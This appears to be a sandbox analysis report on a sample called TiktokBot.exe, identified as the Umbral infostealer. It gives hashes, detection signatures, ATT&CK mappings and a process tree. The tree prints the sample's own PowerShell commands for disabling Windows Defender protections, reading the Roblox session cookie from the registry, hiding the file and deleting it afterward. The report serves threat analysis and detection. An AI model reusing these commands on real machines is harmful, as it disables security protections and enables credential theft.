Analysis
-
max time kernel
437s -
max time network
468s -
platform
windows11-21h2_x64 -
resource
win11-20241023-en -
resource tags
arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system -
submitted
29-12-2024 17:10
General
-
Target
TiktokBot.exe
-
Size
359KB
-
MD5
8669778992324151f3e3f6f454a9b7a3
-
SHA1
676cfdaf3b5b5e58441a814cabfa8fac3630ef15
-
SHA256
fa6e05570392f0c4dfe34ce0469eead7621388809cda5dd5e576c1e1ea6d6339
-
SHA512
8d86798a61443a26d16cefbeb0b74beb6837bbfb999a36ece22664b6beae8c2404520b6b4047bbbf52c3b278a2e897836e3b6657c9f082c18ce63d97a4d2e510
-
SSDEEP
6144:JloZM+rIkd8g+EtXHkv/iD4I06la43TwjJc6rrSNeb8e1myUi/Uy7P9f6dGYZthv:7oZtL+EP8I06la43TwjJc6rrSoZdnPcC
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/3856-1-0x0000014DBB450000-0x0000014DBB4B0000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3700 powershell.exe 2336 powershell.exe 2428 powershell.exe 4896 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts TiktokBot.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 discord.com 1 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4604 cmd.exe 4764 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1872 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4764 PING.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3856 TiktokBot.exe 3700 powershell.exe 3700 powershell.exe 2336 powershell.exe 2336 powershell.exe 2428 powershell.exe 2428 powershell.exe 2920 powershell.exe 2920 powershell.exe 4896 powershell.exe 4896 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3856 TiktokBot.exe Token: SeIncreaseQuotaPrivilege 2084 wmic.exe Token: SeSecurityPrivilege 2084 wmic.exe Token: SeTakeOwnershipPrivilege 2084 wmic.exe Token: SeLoadDriverPrivilege 2084 wmic.exe Token: SeSystemProfilePrivilege 2084 wmic.exe Token: SeSystemtimePrivilege 2084 wmic.exe Token: SeProfSingleProcessPrivilege 2084 wmic.exe Token: SeIncBasePriorityPrivilege 2084 wmic.exe Token: SeCreatePagefilePrivilege 2084 wmic.exe Token: SeBackupPrivilege 2084 wmic.exe Token: SeRestorePrivilege 2084 wmic.exe Token: SeShutdownPrivilege 2084 wmic.exe Token: SeDebugPrivilege 2084 wmic.exe Token: SeSystemEnvironmentPrivilege 2084 wmic.exe Token: SeRemoteShutdownPrivilege 2084 wmic.exe Token: SeUndockPrivilege 2084 wmic.exe Token: SeManageVolumePrivilege 2084 wmic.exe Token: 33 2084 wmic.exe Token: 34 2084 wmic.exe Token: 35 2084 wmic.exe Token: 36 2084 wmic.exe Token: SeIncreaseQuotaPrivilege 2084 wmic.exe Token: SeSecurityPrivilege 2084 wmic.exe Token: SeTakeOwnershipPrivilege 2084 wmic.exe Token: SeLoadDriverPrivilege 2084 wmic.exe Token: SeSystemProfilePrivilege 2084 wmic.exe Token: SeSystemtimePrivilege 2084 wmic.exe Token: SeProfSingleProcessPrivilege 2084 wmic.exe Token: SeIncBasePriorityPrivilege 2084 wmic.exe Token: SeCreatePagefilePrivilege 2084 wmic.exe Token: SeBackupPrivilege 2084 wmic.exe Token: SeRestorePrivilege 2084 wmic.exe Token: SeShutdownPrivilege 2084 wmic.exe Token: SeDebugPrivilege 2084 wmic.exe Token: SeSystemEnvironmentPrivilege 2084 wmic.exe Token: SeRemoteShutdownPrivilege 2084 wmic.exe Token: SeUndockPrivilege 2084 wmic.exe Token: SeManageVolumePrivilege 2084 wmic.exe Token: 33 2084 wmic.exe Token: 34 2084 wmic.exe Token: 35 2084 wmic.exe Token: 36 2084 wmic.exe Token: SeDebugPrivilege 3700 powershell.exe Token: SeDebugPrivilege 2336 powershell.exe Token: SeDebugPrivilege 2428 powershell.exe Token: SeDebugPrivilege 2920 powershell.exe Token: SeIncreaseQuotaPrivilege 3768 wmic.exe Token: SeSecurityPrivilege 3768 wmic.exe Token: SeTakeOwnershipPrivilege 3768 wmic.exe Token: SeLoadDriverPrivilege 3768 wmic.exe Token: SeSystemProfilePrivilege 3768 wmic.exe Token: SeSystemtimePrivilege 3768 wmic.exe Token: SeProfSingleProcessPrivilege 3768 wmic.exe Token: SeIncBasePriorityPrivilege 3768 wmic.exe Token: SeCreatePagefilePrivilege 3768 wmic.exe Token: SeBackupPrivilege 3768 wmic.exe Token: SeRestorePrivilege 3768 wmic.exe Token: SeShutdownPrivilege 3768 wmic.exe Token: SeDebugPrivilege 3768 wmic.exe Token: SeSystemEnvironmentPrivilege 3768 wmic.exe Token: SeRemoteShutdownPrivilege 3768 wmic.exe Token: SeUndockPrivilege 3768 wmic.exe Token: SeManageVolumePrivilege 3768 wmic.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 3856 wrote to memory of 2084 3856 TiktokBot.exe 78 PID 3856 wrote to memory of 2084 3856 TiktokBot.exe 78 PID 3856 wrote to memory of 1652 3856 TiktokBot.exe 81 PID 3856 wrote to memory of 1652 3856 TiktokBot.exe 81 PID 3856 wrote to memory of 3700 3856 TiktokBot.exe 83 PID 3856 wrote to memory of 3700 3856 TiktokBot.exe 83 PID 3856 wrote to memory of 2336 3856 TiktokBot.exe 85 PID 3856 wrote to memory of 2336 3856 TiktokBot.exe 85 PID 3856 wrote to memory of 2428 3856 TiktokBot.exe 87 PID 3856 wrote to memory of 2428 3856 TiktokBot.exe 87 PID 3856 wrote to memory of 2920 3856 TiktokBot.exe 89 PID 3856 wrote to memory of 2920 3856 TiktokBot.exe 89 PID 3856 wrote to memory of 3768 3856 TiktokBot.exe 91 PID 3856 wrote to memory of 3768 3856 TiktokBot.exe 91 PID 3856 wrote to memory of 2068 3856 TiktokBot.exe 93 PID 3856 wrote to memory of 2068 3856 TiktokBot.exe 93 PID 3856 wrote to memory of 1684 3856 TiktokBot.exe 95 PID 3856 wrote to memory of 1684 3856 TiktokBot.exe 95 PID 3856 wrote to memory of 4896 3856 TiktokBot.exe 97 PID 3856 wrote to memory of 4896 3856 TiktokBot.exe 97 PID 3856 wrote to memory of 1872 3856 TiktokBot.exe 99 PID 3856 wrote to memory of 1872 3856 TiktokBot.exe 99 PID 3856 wrote to memory of 4604 3856 TiktokBot.exe 101 PID 3856 wrote to memory of 4604 3856 TiktokBot.exe 101 PID 4604 wrote to memory of 4764 4604 cmd.exe 103 PID 4604 wrote to memory of 4764 4604 cmd.exe 103 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1652 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\TiktokBot.exe"C:\Users\Admin\AppData\Local\Temp\TiktokBot.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3856 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\TiktokBot.exe"2⤵
- Views/modifies file attributes
PID:1652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\TiktokBot.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3768
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:2068
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4896
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1872
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\TiktokBot.exe" && pause2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4764
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD52ab9885ed803576dfcb4df976a3e7ca0
SHA149a54d1bb797dca76c41f6af288f9df6c705cf56
SHA2569a7f8ca5a6bfcd5839a1cd029a116378bec3be1baec9db19bbe4f127199fb322
SHA512b1f90e17c21425cd94a7f00438386ae40c7414784a96694432e340e35ba6a60e1176a2871a732474db4bd7080ebdbf4c476b61efa49fedf8208b382252ae25ba
-
Filesize
948B
MD56490e5c0581c173062323b1c20cfd9ff
SHA11652893659f99b780fd9733243637eb7795f5212
SHA256a552b6d7bebb1714f01a5f3d8b5493e1b369c93ee68c62256dfddcc7f3f4fe79
SHA512fdb077b40b4371a74cb70ae74d28a4433399e5c4a69fe9a5652409a62c2435d3197da42808d5cb65e9b7ff35bc2e593ad70fa83581c7fd672d631b25f53d3c65
-
Filesize
1KB
MD57332074ae2b01262736b6fbd9e100dac
SHA122f992165065107cc9417fa4117240d84414a13c
SHA256baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa
SHA5124ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2
-
Filesize
1KB
MD52feabfbd770a8288d9285124fc074393
SHA1a343223e5743c80746c3f8baf90da92a8c3f85c3
SHA2566379f1dac31d1ec4215ee1c74ff40a9b59dcabc581b99947367b49e8c00a8598
SHA512035458175c3815aed655466cc5286a6de9215df98bcad39ad36b2834087a2f5ac31cbfc0f085854da59b3bb816a7f773b71ce1e78aaf4817b3257c177071e7eb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82